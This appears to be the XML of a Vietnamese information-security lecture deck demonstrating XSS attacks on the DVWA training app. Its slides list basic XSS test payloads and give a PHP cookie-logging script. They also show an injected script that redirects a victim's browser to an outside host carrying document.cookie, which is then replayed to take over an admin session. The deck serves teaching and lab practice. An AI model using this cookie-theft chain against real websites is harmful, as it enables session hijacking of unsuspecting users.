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editthiscooki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855" y="3614563"/>
            <a:ext cx="9235858" cy="2560767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/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endParaRPr lang="vi-V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K14</a:t>
            </a:r>
            <a:endParaRPr lang="vi-V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73437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348" y="776615"/>
            <a:ext cx="8855901" cy="5511450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050" algn="l">
              <a:buAutoNum type="roman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DVWA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cookie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35" y="1814251"/>
            <a:ext cx="1400175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554" y="1823776"/>
            <a:ext cx="1514475" cy="51435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2812810" y="2076189"/>
            <a:ext cx="1951744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782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333" y="1791222"/>
            <a:ext cx="7766936" cy="167089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DVWA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36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671" y="579327"/>
            <a:ext cx="8855901" cy="551145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DVWA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DVWA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script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script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 submit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F12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22" y="2408063"/>
            <a:ext cx="6619875" cy="206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22" y="5185902"/>
            <a:ext cx="65627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93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348" y="776615"/>
            <a:ext cx="8855901" cy="5511450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050" algn="l">
              <a:buAutoNum type="roman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DVWA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-400050" algn="l">
              <a:buAutoNum type="roman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C:\Program Files (x86)\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\www\DVWA\vulnerabilities\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xss_s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Edit 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notepad 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notepad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td&gt;&lt;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name=\"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mtxMessage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\" cols=\"50\" rows=\"3\"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=\"50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\"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=\"250\“</a:t>
            </a:r>
            <a:b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85" y="2140319"/>
            <a:ext cx="48768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24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348" y="776615"/>
            <a:ext cx="8855901" cy="5511450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050" algn="l">
              <a:buAutoNum type="roman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DVWA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-400050" algn="l">
              <a:buAutoNum type="roman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AutoNum type="romanUcPeriod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một số đoạn script cơ bản để soát lỗi xss cho website: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vi-V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&lt;script&gt;alert("XSS")&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-V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vi-VN" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1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vi-V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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-V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script&gt;alert("XSS")&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1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vi-V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"&gt;&lt;script&gt;alert(String.fromCharCode(88,83,83)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1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vi-V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'&gt;&lt;script&gt;alert("XSS")&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1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vi-V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'&gt;&lt;script&gt;alert(String.fromCharCode(88,83,83)&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-V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vi-V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>
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRP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alert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58" y="3081403"/>
            <a:ext cx="6368115" cy="231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72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348" y="776615"/>
            <a:ext cx="8855901" cy="5511450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050" algn="l">
              <a:buAutoNum type="roman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DVWA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cookie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getCookie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HTTP_GET_VAR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&lt;?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$cookie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=$HTTP_GET_VAR["cookie"]; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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steal=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logs.txt","a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	 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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steal,$cookie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."\n");	 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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($steal);                  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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?&gt;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getCookie.php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file cookie get cookie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HTTP_GET_VAR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logs.txt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298" y="2573316"/>
            <a:ext cx="4152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42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348" y="776615"/>
            <a:ext cx="8855901" cy="5511450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050" algn="l">
              <a:buAutoNum type="roman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DVWA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logs.txt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getCookie.php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</a:t>
            </a:r>
            <a:b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file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public_html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07" y="1582650"/>
            <a:ext cx="7262552" cy="258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01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348" y="776615"/>
            <a:ext cx="8855901" cy="5511450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050" algn="l">
              <a:buAutoNum type="roman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DVWA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script test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script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vi-VN" sz="1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script&gt;location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN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vi-VN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vi-VN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www.xss.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1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/getCookie.php?cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN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='+document.cookie;&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1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vi-VN" sz="1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vi-V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tên miền vừa up 2 file lên host</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="vi-V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endParaRPr lang="vi-V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Ok, Lúc này vic sẽ click vào cái mình up lên và cookie sẽ đc lưu vào file logs.txt trên host</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="vi-V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hiện tại là admin</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="vi-V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Kiểm tra file logs.txt trên host</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="vi-V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32340" y="1703540"/>
            <a:ext cx="601249" cy="20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87" y="2026018"/>
            <a:ext cx="6467475" cy="1609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612" y="4062934"/>
            <a:ext cx="2447925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087" y="5101486"/>
            <a:ext cx="78581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62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348" y="776615"/>
            <a:ext cx="8855901" cy="5511450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050" algn="l">
              <a:buAutoNum type="roman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DVWA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cookie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http://www.editthiscookie.com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Value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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48kis1rn80lpu11egg6e5724i3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host)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026" y="876824"/>
            <a:ext cx="4305300" cy="2076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775" y="2189510"/>
            <a:ext cx="1266825" cy="6000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212600" y="1915049"/>
            <a:ext cx="1559816" cy="57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020" y="3449748"/>
            <a:ext cx="47529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00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97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Đảm bảo an toàn thông tin </vt:lpstr>
      <vt:lpstr>Tấn công XSS trên DVWA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Đảm bảo an toàn thông tin</dc:title>
  <dc:creator>Phúc Binz</dc:creator>
  <cp:lastModifiedBy>Vu</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-09-29T06:50:30Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-25T09:14:53Z</dcterms:modified>
</cp:coreProperties>
</file>